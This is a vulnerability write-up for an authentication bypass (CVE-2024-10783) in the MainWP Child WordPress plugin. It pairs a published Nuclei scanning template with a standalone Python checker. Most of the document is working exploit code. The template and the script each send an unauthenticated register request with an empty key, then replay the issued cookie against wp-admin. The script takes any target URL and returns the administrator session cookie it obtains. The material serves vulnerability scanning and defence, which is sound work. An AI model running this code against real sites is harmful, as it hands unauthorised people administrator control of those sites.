The plugin is vulnerable to an authentication bypass that allows an unauthenticated user to login as an administrator without providing a password. This vulnerability is only exploitable when the plugin has not been connected to a MainWP Dashboard and the "Require unique security ID" option is not enabled (it is disabled by default).
PoC code (published)
id: CVE-2024-10783

info:
  name: WordPress Plugin MainWP Child - Authentication Bypass
  author: Sean Murphy,iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    The plugin is vulnerable to an authentication bypass that allows an unauthenticated user to login as an administrator without providing a password. This vulnerability is only exploitable when the plugin has not been connected to a MainWP Dashboard and the "Require unique security ID" option is not enabled (it is disabled by default).
  reference:
    - https://wpscan.com/vulnerability/1898d4f4-1874-4d00-8930-15774d57c9ed/
    - https://plugins.trac.wordpress.org/browser/mainwp-child/tags/5.2/class/class-mainwp-child.php#L76
    - https://plugins.trac.wordpress.org/browser/mainwp-child/tags/5.2/class/class-mainwp-connect.php#L69
    - https://plugins.trac.wordpress.org/browser/mainwp-child/tags/5.2/class/class-mainwp-connect.php#L788
    - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3197586%40mainwp-child&new=3197586%40mainwp-child&sfp_email=&sfph_mail=
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2024-10783
    cwe-id: CWE-862
    epss-score: 0.26953
    epss-percentile: 0.96155
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "/wp-content/plugins/mainwp-child/"
  tags: cve,cve2024,wp,mainwp-child,wpscan,wordpress,wp-plugin,auth-bypass,vuln

flow: http(1) && http(2)

variables:
  username: admin

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        function=register&user={{username}}&pubkey=

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - wordpress_logged_in
        internal: true

      - type: word
        part: body
        words:
          - '<mainwp>'
        internal: true

  - raw:
      - |
        GET /wp-admin/index.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Howdy, {{username}}'

      - type: status
        status:
          - 200
# digest: 4a0a0047304502202b952add0c8ecbc86d0e39c37de74f8384bfb9f6c8791e2155316570dac37c1d022100dd930fd603bfd28fb3e30a121180f093e49cd0e19bd6f496f646d61ecbbd1f6e:922c64590222798bb761d5b6d8e72950
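The same two-request flow, written out as a standalone checker so the logic of the template is visible without Nuclei. This is an added example and is not code from the Nuclei project or from the MainWP plugin. It assumes only what the template shows: an unauthenticated POST to the site root with function=register, an existing user name and an empty pubkey must answer with a wordpress_logged_in cookie and an <mainwp> element, and replaying that cookie against /wp-admin/index.php must show the admin-bar greeting for that user. The `send` transport hook, the `make_fake_site` stand-in and every response body it returns are constructed for offline testing and are not real plugin output.

```python
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, List, Optional, Tuple

# One HTTP exchange: status, response headers as (name, value) pairs, body text.
Response = Tuple[int, List[Tuple[str, str]], str]
# Transport hook: (method, url, form body or None, Cookie header value) -> Response.
Transport = Callable[[str, str, Optional[str], str], Response]


def _urllib_transport(method: str, url: str, body: Optional[str], cookie: str) -> Response:
    """Default transport: plain urllib, no third-party dependencies."""
    data = body.encode() if body is not None else None
    req = urllib.request.Request(url, data=data, method=method)
    if data is not None:
        req.add_header("Content-Type", "application/x-www-form-urlencoded")
    if cookie:
        req.add_header("Cookie", cookie)
    try:
        with urllib.request.urlopen(req, timeout=15) as r:
            return r.status, list(r.headers.items()), r.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:  # 4xx/5xx responses still carry a body worth reading
        return e.code, list(e.headers.items()), e.read().decode("utf-8", "replace")


def cookies_from_headers(headers: List[Tuple[str, str]]) -> str:
    """Collapse every Set-Cookie header into one Cookie request-header value."""
    pairs = [v.split(";", 1)[0].strip() for n, v in headers if n.lower() == "set-cookie"]
    return "; ".join(p for p in pairs if p)


def probe_register(base_url: str, username: str, send: Transport) -> Tuple[bool, str]:
    """Request 1 of the template: unauthenticated register call with an empty pubkey.
    Both template matchers must hit (matchers-condition: and): a login cookie in the
    headers and an <mainwp> element in the body. Returns (matched, cookie_header)."""
    form = urllib.parse.urlencode({"function": "register", "user": username, "pubkey": ""})
    _status, headers, text = send("POST", base_url.rstrip("/") + "/", form, "")
    cookie = cookies_from_headers(headers)
    return ("wordpress_logged_in" in cookie and "<mainwp>" in text), cookie


def confirm_admin(base_url: str, username: str, cookie: str, send: Transport) -> bool:
    """Request 2 of the template: replay the issued cookie against wp-admin and look for
    the admin-bar greeting of the account we asked to be logged in as."""
    url = base_url.rstrip("/") + "/wp-admin/index.php"
    status, _headers, text = send("GET", url, None, cookie)
    return status == 200 and f"Howdy, {username}" in text


def check_mainwp_child_bypass(base_url: str, username: str = "admin",
                              send: Transport = _urllib_transport) -> dict:
    """Full flow http(1) && http(2). Stops at the first stage that does not match, so a
    stray <mainwp> tag without a cookie, or a cookie that wp-admin rejects, is not
    reported as a finding."""
    matched, cookie = probe_register(base_url, username, send)
    if not matched:
        return {"vulnerable": False, "stage": "register"}
    if not confirm_admin(base_url, username, cookie, send):
        return {"vulnerable": False, "stage": "wp-admin"}
    return {"vulnerable": True, "stage": "confirmed", "cookie": cookie}


def make_fake_site(vulnerable: bool) -> Transport:
    """Constructed stand-in for a MainWP Child site, used only to run the checker
    offline. The bodies below are made up for this example, not real plugin output."""
    issued = {}

    def fake(method: str, url: str, body: Optional[str], cookie: str) -> Response:
        path = urllib.parse.urlsplit(url).path
        if method == "POST" and path == "/" and body:
            form = urllib.parse.parse_qs(body)
            if form.get("function") == ["register"] and vulnerable:
                issued["user"] = form.get("user", [""])[0]
                hdrs = [("Set-Cookie", "wordpress_logged_in_1a2b=" + issued["user"] + "|fake; Path=/")]
                return 200, hdrs, "<mainwp>register:ok</mainwp>"
            # Hardened behaviour: still answers in the <mainwp> envelope, but no session.
            return 200, [], "<mainwp>register:denied</mainwp>"
        if method == "GET" and path == "/wp-admin/index.php":
            if "wordpress_logged_in" in cookie and issued.get("user"):
                return 200, [], '<span class="display-name">Howdy, ' + issued["user"] + "</span>"
            return 302, [("Location", "/wp-login.php")], ""
        return 404, [], ""

    return fake


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:  # python check.py https://target.example
        print(check_mainwp_child_bypass(sys.argv[1]))
    else:                  # no target given: exercise the constructed fake site
        print(check_mainwp_child_bypass("http://site.test", send=make_fake_site(True)))
```

The `user` value has to name an account that exists on the site; the template's `username: admin` is only a default, and the second request fails cleanly (stage `wp-admin`) when the greeting for that name never appears. Keeping the two stages separate also makes the `internal: true` matchers of the template explicit: a `<mainwp>` body on its own is just the plugin answering, and only the combination of issued cookie plus an authenticated wp-admin page is a confirmed bypass.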